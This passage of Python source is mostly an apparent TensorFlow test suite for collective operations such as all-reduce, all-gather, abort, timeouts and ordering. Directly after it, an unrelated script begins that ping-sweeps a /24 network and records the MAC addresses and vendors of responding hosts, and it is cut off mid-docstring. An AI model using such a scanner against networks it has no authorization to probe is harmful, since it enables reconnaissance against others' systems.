      collectives = []
      with ops.device(dev0):
        collectives.append(
            collective_ops.all_reduce(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      with ops.device(dev1):
        collectives.append(
            collective_ops.all_reduce(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      return collectives

    self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
    for result in run_all_reduce_2devices():
      self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)

  def testGather(self, collective_ops, device, communication):
    """All-gather concatenates each member's tensor."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device

    @def_function.function
    def run_all_gather_1device():
      with ops.device(dev0):
        in_value = constant_op.constant([1.])
        group_size = 1
        group_key = 1
        instance_key = 1
        return collective_ops.all_gather(
            in_value,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    @def_function.function
    def run_all_gather_2devices():
      in_value = constant_op.constant([1.])
      group_size = 2
      group_key = 2
      instance_key = 2
      collectives = []
      with ops.device(dev0):
        collectives.append(
            collective_ops.all_gather(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      with ops.device(dev1):
        collectives.append(
            collective_ops.all_gather(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      return collectives

    self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
    for result in run_all_gather_2devices():
      self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)

  def testBroadcast(self, collective_ops, device, communication):
    """broadcast_send on dev0 is received unchanged by dev1."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device

    @def_function.function
    def run_broadcast_2devices():
      shape = [3]
      in_value = constant_op.constant([1., 2., 3.], shape=shape)
      group_size = 2
      group_key = 2
      instance_key = 2
      collectives = []
      with ops.device(dev0):
        collectives.append(
            collective_ops.broadcast_send(
                in_value,
                shape,
                in_value.dtype,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      with ops.device(dev1):
        collectives.append(
            collective_ops.broadcast_recv(
                shape,
                in_value.dtype,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      return collectives

    for result in run_broadcast_2devices():
      self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)

  def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
                                         communication):
    """The same instance key may be reused by different groups."""
    if device == 'GPU' and context.num_gpus() < 4:
      self.skipTest('not enough GPU')
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    dev2 = '/device:%s:2' % device
    dev3 = '/device:%s:3' % device

    @def_function.function
    def run_all_reduce_4devices_same_instance_key():
      # Use a common instance key for both groups.
      instance_key = 0
      # We will create 2 groups each with 2 devices.
      group_size = 2
      # Group 0 comprises dev0 and dev1.
      group0_key = 0
      # Group 1 comprises dev2 and dev3.
      group1_key = 1
      collectives = []
      with ops.device(dev0):
        collectives.append(
            collective_ops.all_reduce(
                constant_op.constant(1.), group_size, group0_key, instance_key))
      with ops.device(dev1):
        collectives.append(
            collective_ops.all_reduce(
                constant_op.constant(2.), group_size, group0_key, instance_key))
      with ops.device(dev2):
        collectives.append(
            collective_ops.all_reduce(
                constant_op.constant(3.), group_size, group1_key, instance_key))
      with ops.device(dev3):
        collectives.append(
            collective_ops.all_reduce(
                constant_op.constant(4.), group_size, group1_key, instance_key))
      return collectives

    results = run_all_reduce_4devices_same_instance_key()
    # Group 0 reduces 1+2, group 1 reduces 3+4.
    self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
    self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
    self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
    self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)

  def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
    """Group size 1 collectives return the input unchanged."""
    dev0 = '/device:%s:0' % device
    group_size = 1
    group_key = 100
    in_value = [1., 2., 3., 4.]
    in_tensor = constant_op.constant(in_value)

    with ops.device(dev0):
      reduced_tensor = collective_ops.all_reduce(
          in_tensor,
          group_size,
          group_key,
          instance_key=100,
          communication_hint=communication)
    self.assertAllEqual(in_value, reduced_tensor.numpy())

    with ops.device(dev0):
      gathered_tensor = collective_ops.all_gather(
          in_tensor,
          group_size,
          group_key,
          instance_key=200,
          communication_hint=communication)
    self.assertAllEqual(in_value, gathered_tensor.numpy())

  def testCollectiveInvalidKey(self, collective_ops, device, communication):
    """Reusing an instance key with a different op type is an error."""
    dev0 = '/device:%s:0' % device
    group_size = 1
    group_key = 100
    instance_key = 100
    in_value = [1., 2., 3., 4.]
    in_tensor = constant_op.constant(in_value)

    with ops.device(dev0):
      reduced_tensor = collective_ops.all_reduce(
          in_tensor,
          group_size,
          group_key,
          instance_key,
          communication_hint=communication)
    self.assertAllEqual(in_value, reduced_tensor.numpy())

    with self.assertRaisesRegex(
        errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
        ' got type 2 and data_type 1'):
      with ops.device(dev0):
        collective_ops.all_gather(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

  def testMultipleGroups(self, collective_ops, device, communication):
    """Independent groups of different sizes can run back to back."""
    if device == 'GPU' and context.num_gpus() < 4:
      self.skipTest('not enough GPU')
    num_elements = 4

    @def_function.function
    def run_all_reduce(group_size, group_key):
      instance_key = group_key
      input_value = [float(group_key) for i in range(num_elements)]
      collectives = []
      for device_idx in range(group_size):
        with ops.device('/{}:{}'.format(device, device_idx)):
          input_tensor = constant_op.constant(input_value)
          collectives.append(
              collective_ops.all_reduce(
                  input_tensor,
                  group_size,
                  group_key,
                  instance_key,
                  communication_hint=communication))
      return collectives

    def run_and_assert(group_size, group_key):
      for reduced_tensor in run_all_reduce(group_size, group_key):
        self.assertAllEqual(
            [float(group_key) * group_size for i in range(num_elements)],
            reduced_tensor.numpy())

    run_and_assert(group_size=2, group_key=1)
    run_and_assert(group_size=3, group_key=2)
@combinations.generate(
    combinations.times(
        combinations.combine(
            collective_ops=[
                combinations.NamedObject('v2', CollectiveOpsV2)
            ],
            mode='eager',
            max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
  """Exercises V2 all-reduce with the max_subdivs_per_device argument."""

  def setUp(self):
    _setup_context()
    super().setUp()

  def testReduce(self, collective_ops, device, communication,
                 max_subdivs_per_device):
    """All-reduce works for group sizes 1 and 2 regardless of subdivisions."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device

    @def_function.function
    def run_all_reduce_1device():
      with ops.device(dev0):
        in_value = constant_op.constant([1.])
        group_size = 1
        group_key = 1
        instance_key = 1
        # -1 means "use the op default": omit the argument entirely.
        if max_subdivs_per_device == -1:
          return collective_ops.all_reduce(
              in_value,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)
        else:
          return collective_ops.all_reduce(
              in_value,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication,
              max_subdivs_per_device=max_subdivs_per_device)

    @def_function.function
    def run_all_reduce_2devices():
      in_value = constant_op.constant([1.])
      group_size = 2
      group_key = 2
      instance_key = 2
      collectives = []
      with ops.device(dev0):
        collectives.append(
            collective_ops.all_reduce(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      with ops.device(dev1):
        collectives.append(
            collective_ops.all_reduce(
                in_value,
                group_size,
                group_key,
                instance_key,
                communication_hint=communication))
      return collectives

    self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
    for result in run_all_reduce_2devices():
      self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
    combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
  """Collective all-reduce from inside jit_compile'd functions."""

  def testReduce(self):
    """Two threads each launch an XLA-compiled all-reduce on its own GPU."""
    device0 = '/device:GPU:0'
    device1 = '/device:GPU:1'
    group_size = 2
    group_key = 100
    instance_key = 100
    results = []

    def all_reduce(device):
      @def_function.function(jit_compile=True)
      def f():
        return _collective_ops.all_reduce_v2([1.], group_size, group_key,
                                             instance_key)

      with ops.device(device):
        results.append(f())

    # Run both members concurrently — each would block waiting for its peer.
    t0 = threading.Thread(target=all_reduce, args=(device0,))
    t1 = threading.Thread(target=all_reduce, args=(device1,))
    t0.start()
    t1.start()
    t0.join()
    t1.join()

    self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(
    combinations.times(collective_op_combinations, device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
  """Verifies abort_collective_ops unblocks hanging collectives at each
  phase (group resolution, instance resolution, communication) and that
  the executor works again after a context reset."""

  def setUp(self):
    _setup_context()
    super().setUp()

  def testAbortGroupParamsResolution(self, collective_op, device,
                                     communication):
    """Abort while a collective hangs in group parameter resolution."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])

    def abort_fn():
      # Give the collective below time to launch and hang before aborting.
      time.sleep(2)
      context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')

    t = threading.Thread(target=abort_fn)
    t.start()

    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      # This hangs on params resolution since we're only launching one
      # collective for a group size of 2.
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    # After abortion, subsequent collectives should fail immediately.
    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    t.join()
    # Reset the context in order to reset the collective executor.
    _setup_context()

    # After reset non-NCCL collectives should work.
    def collective_fn():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              in_tensor,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)

    def_function.function(collective_fn)()

  def testAbortInstanceParamsResolution(self, collective_op, device,
                                        communication):
    """Abort while a collective hangs in instance parameter resolution."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])

    def collective_fn():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              in_tensor,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)

    # First perform a normal all-reduce to complete the group resolution.
    def_function.function(collective_fn)()

    def abort_fn():
      time.sleep(2)
      context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')

    t = threading.Thread(target=abort_fn)
    t.start()

    # Use a different instance key to trigger another instance resolution.
    instance_key = 101
    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      # This hangs on params resolution since we're only launching one
      # collective for a group size of 2.
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    # After abortion, subsequent collectives should fail immediately.
    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    context._reset_context()  # pylint: disable=protected-access
    t.join()
    # Reset the context in order to reset the collective executor.
    _setup_context()
    # After reset non-NCCL collectives should work.
    def_function.function(collective_fn)()

  def testAbortCommunication(self, collective_op, device, communication):
    """Abort while a collective hangs in the communication phase."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])

    # First perform a normal collective to finish resolution.
    def collective_fn():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              in_tensor,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)

    def_function.function(collective_fn)()

    # Launch a collective that hangs, and abort the collective executor after
    # the launch.
    def abort_fn():
      time.sleep(2)
      context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')

    t = threading.Thread(target=abort_fn)
    t.start()

    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    # After abortion, subsequent collectives should fail immediately.
    with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)

    # Reset the context in order to reset the collective executor.
    t.join()
    _setup_context()
    def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
  """Tests how collective ops behave when other ops error or are cancelled."""
  def setUp(self):
    # Start each test from a fresh context so collective state (groups,
    # executors) cannot leak between tests.
    _setup_context()
    super().setUp()
  @combinations.generate(
      combinations.times(
          combinations.combine(
              collective_op=[
                  combinations.NamedObject('all_reduce',
                                           CollectiveOpsV1.all_reduce),
                  combinations.NamedObject('all_reduce_v2',
                                           CollectiveOpsV2.all_reduce),
                  combinations.NamedObject('all_gather',
                                           CollectiveOpsV1.all_gather),
                  combinations.NamedObject('all_gather_v2',
                                           CollectiveOpsV2.all_gather),
              ],
              mode='eager'), device_combination))
  def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
                                        communication):
    """An op error with no collective in flight must not abort collectives."""
    # Do not abort if there's no active collective ops. There could be
    # exceptions like EOF which we expect users to catch, aborting collective
    # ops on all op errors intervenes with this workflow.
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    dataset = dataset_ops.Dataset.from_tensors([1.])
    @def_function.function
    def collective_fn(in_tensor):
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              in_tensor,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)
    @def_function.function
    def f():
      iterator = iter(dataset)
      collective_fn(next(iterator))
      # This next(iterator) should raise EOF.
      collective_fn(next(iterator))
    with self.assertRaises(errors.OutOfRangeError):
      f()
    # Collectives must still work after the expected EOF error.
    collective_fn(constant_op.constant([1.]))
  @combinations.generate(
      combinations.times(
          combinations.combine(
              collective_op=[
                  combinations.NamedObject('all_reduce',
                                           CollectiveOpsV1.all_reduce),
                  combinations.NamedObject('all_gather',
                                           CollectiveOpsV1.all_gather),
              ],
              mode='eager'), device_combination))
  def testOpErrorAbortWithCollective(self, collective_op, device,
                                     communication):
    """V1 collectives in flight are aborted when another op errors."""
    # Abort v1 collective ops if there're active collective ops at the time of
    # an op error. This is due to the inability to cancel collective ops, and op
    # errors may cause running collective ops to hang.
    dev0 = '/device:%s:0' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])
    # Make the dataset sleep a while so that the collective is being executed
    # when the EOF happens.
    dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
        dataset_testing.sleep(sleep_microseconds=200))
    @def_function.function
    def f():
      # Launch a collective op that won't be able to finish to test abortion
      # when other ops error.
      with ops.device(dev0):
        ret = collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)
      iterator = iter(dataset)
      next(iterator)
      # This should raise EOF.
      next(iterator)
      return ret
    with self.assertRaises(errors.OutOfRangeError):
      f()
    # Now collective ops is aborted, subsequent collective ops should fail with
    # the previous error.
    with self.assertRaises(errors.CancelledError):
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)
  @combinations.generate(
      combinations.times(
          combinations.combine(
              collective_op=[
                  combinations.NamedObject('all_reduce_v2',
                                           CollectiveOpsV2.all_reduce),
                  combinations.NamedObject('all_gather_v2',
                                           CollectiveOpsV2.all_gather),
              ],
              mode='eager'), device_combination))
  def testOpErrorNotAbortWithCollective(self, collective_op, device,
                                        communication):
    """V2 collectives survive op errors; cancellation handles termination."""
    # Do not abort v2 collective ops even if there're active collective ops at
    # the time of an op error. We rely cancellation to terminate active
    # collective ops.
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])
    @def_function.function
    def collective_fn():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              in_tensor,
              group_size,
              group_key,
              instance_key,
              communication_hint=communication)
    # Local params resolution cannot be cancelled yet, so we perform a normal
    # collective so that the group is resolved.
    collective_fn()
    # Make the dataset sleep a while so that the collective is being executed
    # when the EOF happens.
    dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
        dataset_testing.sleep(sleep_microseconds=200))
    @def_function.function
    def f():
      # Launch a collective op that won't be able to finish to test cancellation
      # when other ops error.
      with ops.device(dev0):
        ret = collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)
      iterator = iter(dataset)
      next(iterator)
      # This should raise EOF.
      next(iterator)
      return ret
    with self.assertRaises(errors.OutOfRangeError):
      f()
    # Collective ops shouldn't be aborted and new collectives should be able to
    # proceed.
    collective_fn()
  @combinations.generate(
      combinations.times(
          combinations.combine(
              collective_op=[
                  combinations.NamedObject('all_reduce_v2',
                                           CollectiveOpsV2.all_reduce),
                  combinations.NamedObject('all_gather_v2',
                                           CollectiveOpsV2.all_gather),
              ],
              mode='eager'), device_combination))
  def testCancelDuringParamResolution(self, collective_op, device,
                                      communication):
    """Cancelling one side during param resolution unblocks the other."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])
    t1_cancellation_manager = cancellation.CancellationManager()
    t2_cancellation_manager = cancellation.CancellationManager()
    @def_function.function
    def _collective_fn(x):
      # Run an assertion to crash one of the two function executions running
      # collectives. We explicitly cancel the other in response.
      assert_op = check_ops.assert_equal(x, in_tensor)
      with ops.control_dependencies([assert_op]):
        return collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            communication_hint=communication)
    collective_concrete = _collective_fn.get_concrete_function(in_tensor)
    finish_mu = threading.Lock()
    finishes = 0
    def _placement_wrapper(device, x, my_cancellation, other_cancellation):
      try:
        with ops.device(device):
          cancelable_collective = my_cancellation.get_cancelable_function(
              collective_concrete)
          return cancelable_collective(x)
      except errors.InvalidArgumentError:
        # `assert_equal` failed for this execution of the function. The other
        # function would deadlock without cancellation.
        other_cancellation.start_cancel()
      except errors.CancelledError:
        pass
      # Count completions under a lock; the test asserts both threads finish.
      nonlocal finishes
      with finish_mu:
        finishes += 1
    t1 = threading.Thread(
        target=_placement_wrapper,
        args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
              t2_cancellation_manager))
    t2 = threading.Thread(
        target=_placement_wrapper,
        # Will cause the assertion to fail
        args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
              t1_cancellation_manager))
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    self.assertEqual(finishes, 2)
@combinations.generate(
    combinations.times(collective_op_combinations, device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
  """Tests the `timeout` argument of collective ops."""
  def setUp(self):
    # Fresh context per test so earlier timeouts don't poison the executor.
    _setup_context()
    super().setUp()
  def testTimeout(self, collective_op, device, communication):
    """A collective with a missing member times out during execution."""
    timeout = 1.5
    @def_function.function
    def run(group_size, reported_group_size=None):
      group_key = 20
      instance_key = 30
      tensor = [1., 2., 3., 4.]
      results = []
      if reported_group_size is None:
        reported_group_size = group_size
      # Launch `group_size` participants, but report `reported_group_size`
      # to the op; a mismatch makes the collective wait for absent peers.
      for i in range(group_size):
        with ops.device('/{}:{}'.format(device, i)):
          input_data = constant_op.constant(tensor)
          result = collective_op(
              input_data,
              group_size=reported_group_size,
              group_key=group_key,
              instance_key=instance_key,
              communication_hint=communication,
              timeout=timeout)
          results.append(result)
      return results
    run(2, 2)
    start_time = time.time()
    with self.assertRaisesRegex(errors.DeadlineExceededError,
                                'Collective has timed out during execution'):
      run(1, 2)
    # The failure must not occur before the configured timeout has elapsed.
    elapsed = time.time() - start_time
    self.assertAllGreaterEqual(elapsed, timeout)
  def testParamResolutionAfterTimeout(self, collective_op, device,
                                      communication):
    """Late joiners fail immediately after a param-resolution timeout."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    timeout = 1.5
    group_key = 20
    instance_key = 30
    input_data = constant_op.constant([1., 2., 3., 4.])
    # This timeout comes from param solution.
    with self.assertRaisesRegex(
        errors.DeadlineExceededError,
        'Collective has timed out waiting for other workers'):
      with ops.device(dev0):
        collective_op(
            input_data,
            group_size=2,
            group_key=group_key,
            instance_key=instance_key,
            communication_hint=communication,
            timeout=timeout)
    # We launch the second device after the first device times out. This is to
    # simulate the situation when other workers are slow and the timeout is
    # short. It should error immediately.
    with self.assertRaisesRegex(
        errors.DeadlineExceededError,
        'Collective has timed out waiting for other workers'):
      with ops.device(dev1):
        collective_op(
            input_data,
            group_size=2,
            group_key=group_key,
            instance_key=instance_key,
            communication_hint=communication)
  def testExecutionAfterTimeout(self, collective_op, device, communication):
    """Late joiners fail immediately after an execution-phase timeout."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    timeout = 1.5
    group_key = 20
    instance_key = 30
    input_data = constant_op.constant([1., 2., 3., 4.])
    @def_function.function
    def run():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              input_data,
              group_size=2,
              group_key=group_key,
              instance_key=instance_key,
              communication_hint=communication,
              timeout=timeout)
    # Run a normal all-reduce to complete param resolution.
    run()
    with self.assertRaisesRegex(errors.DeadlineExceededError,
                                'Collective has timed out during execution'):
      with ops.device(dev0):
        collective_op(
            input_data,
            group_size=2,
            group_key=group_key,
            instance_key=instance_key,
            communication_hint=communication,
            timeout=timeout)
    # We launch the second device after the first device times out. This is to
    # simulate the situation when other workers are slow and the timeout is
    # short. It should error immediately.
    with self.assertRaisesRegex(errors.DeadlineExceededError,
                                'Collective has timed out during execution'):
      with ops.device(dev1):
        # No timeout.
        collective_op(
            input_data,
            group_size=2,
            group_key=group_key,
            instance_key=instance_key,
            communication_hint=communication)
class CommunicationHintTest(test.TestCase, parameterized.TestCase):
  """Tests the `communication_hint` argument of collective ops."""
  def setUp(self):
    _setup_context()
    super().setUp()
  @combinations.generate(
      combinations.times(collective_op_combinations,
                         combinations.combine(required_gpus=[0, 1])))
  def testNCCLFallbackOnCPU(self, collective_op):
    """communication_hint='NCCL' on CPU devices must not fail."""
    # communication_hint=NCCL should work for CPU by falling back to RING. The
    # test doesn't actually require GPU, only GPU builds. We specify
    # required_gpus=1 so that it's tested with GPU builds.
    dev0 = '/device:CPU:0'
    dev1 = '/device:CPU:1'
    group_key = 20
    instance_key = 30
    input_data = constant_op.constant([1., 2., 3., 4.])
    @def_function.function
    def run():
      for device in [dev0, dev1]:
        with ops.device(device):
          collective_op(
              input_data,
              group_size=2,
              group_key=group_key,
              instance_key=instance_key,
              communication_hint='NCCL')
    run()
@combinations.generate(
    combinations.times(
        combinations.combine(
            collective_op=[
                combinations.NamedObject('all_reduce_v2',
                                         CollectiveOpsV2.all_reduce),
                combinations.NamedObject('all_gather_v2',
                                         CollectiveOpsV2.all_gather),
            ],
            mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
  """Tests that `ordering_token` serializes collectives sharing a token."""
  def setUp(self):
    _setup_context()
    super().setUp()
  def testOrdering(self, collective_op, device, communication):
    """Collectives with the same token get chained via control edges."""
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    group_size = 2
    group_key = 100
    instance_key = 100
    in_tensor = constant_op.constant([1.])
    # One ordering-token variable per device; collectives passing the same
    # token handle should be ordered relative to each other.
    with ops.device(dev0):
      token0 = resource_variable_ops.ResourceVariable(0.)
    with ops.device(dev1):
      token1 = resource_variable_ops.ResourceVariable(0.)
    @def_function.function
    def f():
      # Launch the first collective with token.
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            ordering_token=token0.handle)
      with ops.device(dev1):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            ordering_token=token1.handle)
      # Launch the second collective without token.
      with ops.device(dev0):
        collective_op(in_tensor, group_size, group_key, instance_key)
      with ops.device(dev1):
        collective_op(in_tensor, group_size, group_key, instance_key)
      # Launch the third collective with token.
      with ops.device(dev0):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            ordering_token=token0.handle)
      with ops.device(dev1):
        collective_op(
            in_tensor,
            group_size,
            group_key,
            instance_key,
            ordering_token=token1.handle)
    graph = f.get_concrete_function().graph
    for device in [dev0, dev1]:
      # Try to find the third collective, which should have the first collective
      # as a control input.
      third = None
      for op in graph.get_operations():
        if (op.type.startswith('Collective') and op.device.endswith(device) and
            op.control_inputs and
            op.control_inputs[0].type.startswith('Collective')):
          self.assertIsNone(third)
          third = op
      self.assertIsNotNone(third)
      # Verify it's not the second collective by looking at the inputs.
      self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
      first = third.control_inputs[0]
      self.assertEqual(third.device, first.device)
      # Verify it's not the second collective by looking at the inputs.
      self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
      self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
  """Verifies collectives run correctly inside tf.data input pipelines."""
  def setUp(self):
    super().setUp()
    _setup_context()
  def testMap(self):
    """All-reduce applied inside Dataset.map across two CPU devices."""
    group_size = 2
    group_key = 100
    instance_key = 100
    def fetch_reduced(value):
      # Build a one-element dataset, all-reduce the element in map(), and
      # return the first (only) element.
      def _all_reduce(t):
        return CollectiveOpsV2.all_reduce(
            t,
            group_size=group_size,
            group_key=group_key,
            instance_key=instance_key)
      ds = dataset_ops.Dataset.from_tensor_slices([value]).map(_all_reduce)
      return next(iter(ds))
    @def_function.function
    def run_pipeline():
      with ops.device('CPU:0'):
        first = fetch_reduced([1.])
      with ops.device('CPU:1'):
        second = fetch_reduced([2.])
      return first, second
    # 1. + 2. reduced on both devices.
    self.assertAllEqual(self.evaluate(run_pipeline()), [[3.], [3.]])
class CollectiveOpsV3Test(test.TestCase, parameterized.TestCase):
  """Tests the V3 (communicator-handle based) collective ops."""
  def setUp(self):
    super().setUp()
    _setup_context()
  def testGroupInitialization(self):
    """initialize_communicator succeeds for both ranks of a 2-member group."""
    group_size = 2
    group_key = 100
    @def_function.function
    def f():
      with ops.device('CPU:0'):
        _collective_ops.initialize_communicator(
            group_key=group_key, rank=0, group_size=group_size)
      with ops.device('CPU:1'):
        _collective_ops.initialize_communicator(
            group_key=group_key, rank=1, group_size=group_size)
    # TODO(b/193864859): Add validation with reduction op.
    self.evaluate(f())
  @combinations.generate(device_combination)
  def testAllReduceV3(self, device, communication):
    """all_reduce_v3 sums inputs across a 2-device group."""
    group_size = 2
    group_key = 101
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    @def_function.function
    def run_all_reduce_2devices():
      collectives = []
      with ops.device(dev0):
        group_handle0 = _collective_ops.initialize_communicator(
            group_key=group_key,
            rank=0,
            group_size=group_size,
            communication_hint=communication)
        collectives.append(
            _collective_ops.all_reduce_v3(
                group_handle0, [1.0], reduction='Add'))
      with ops.device(dev1):
        group_handle1 = _collective_ops.initialize_communicator(
            group_key=group_key,
            rank=1,
            group_size=group_size,
            communication_hint=communication)
        collectives.append(
            _collective_ops.all_reduce_v3(
                group_handle1, [2.0], reduction='Add'))
      return collectives
    # 1.0 + 2.0 on each participant.
    for result in run_all_reduce_2devices():
      self.assertAllClose(result, [3.], rtol=1e-5, atol=1e-5)
  @combinations.generate(device_combination)
  def testAllToAllV3(self, device, communication):
    """all_to_all_v3 exchanges per-rank slices across a 2-device group."""
    group_size = 2
    group_key = 104
    dev0 = '/device:%s:0' % device
    dev1 = '/device:%s:1' % device
    @def_function.function
    def run_all_to_all_2devices():
      collectives = []
      with ops.device(dev0):
        group_handle0 = _collective_ops.initialize_communicator(
            group_key=group_key,
            rank=0,
            group_size=group_size,
            communication_hint=communication)
        collectives.append(
            _collective_ops.all_to_all_v3(group_handle0, [1.0, 3.0]))
      with ops.device(dev1):
        group_handle1 = _collective_ops.initialize_communicator(
            group_key=group_key,
            rank=1,
            group_size=group_size,
            communication_hint=communication)
        collectives.append(
            _collective_ops.all_to_all_v3(group_handle1, [2.0, 4.0]))
      return collectives
    # Rank 0 receives element 0 of each rank; rank 1 receives element 1.
    result = run_all_to_all_2devices()
    self.assertAllClose(result[0], [1.0, 2.0], rtol=1e-5, atol=1e-5)
    self.assertAllClose(result[1], [3.0, 4.0], rtol=1e-5, atol=1e-5)
def _setup_context():
  """Resets the eager context and ensures at least 4 logical CPU devices.

  Resetting tears down the previous collective executor; tests rely on this
  to recover after aborted or timed-out collectives.
  """
  context._reset_context()
  test_util.set_logical_devices_to_at_least('CPU', 4)
  context.ensure_initialized()
if __name__ == '__main__':
  # Surface NCCL diagnostics in the test log to ease debugging of GPU runs.
  os.environ['NCCL_DEBUG'] = 'INFO'
  v2_compat.enable_v2_behavior()
  test.main()
from multiprocessing import Process, Manager
from os import devnull, popen
from threading import Thread
from subprocess import Popen, PIPE, STDOUT
from tabulate import tabulate
import requests
class ThreadFastScanIP(Thread):
    """Thread that ping-sweeps a /24 network and records responding hosts.

    For every address in ``[range_start, range_end)`` of the gateway's
    network, a child process pings once; responders are stored in
    ``on_ips`` as ``{ip: {'mac': ..., 'vendor': ...}}``.
    """

    def __init__(self, gateway, range_start, range_end, parent=None):
        """
        :param str gateway: any IP on the target network, e.g. '192.168.174.1'.
        :param int range_start: first host number to probe (inclusive).
        :param int range_end: last host number to probe (exclusive).
        :param parent: kept for backward compatibility and ignored.
            threading.Thread has no parent concept; the old code forwarded it
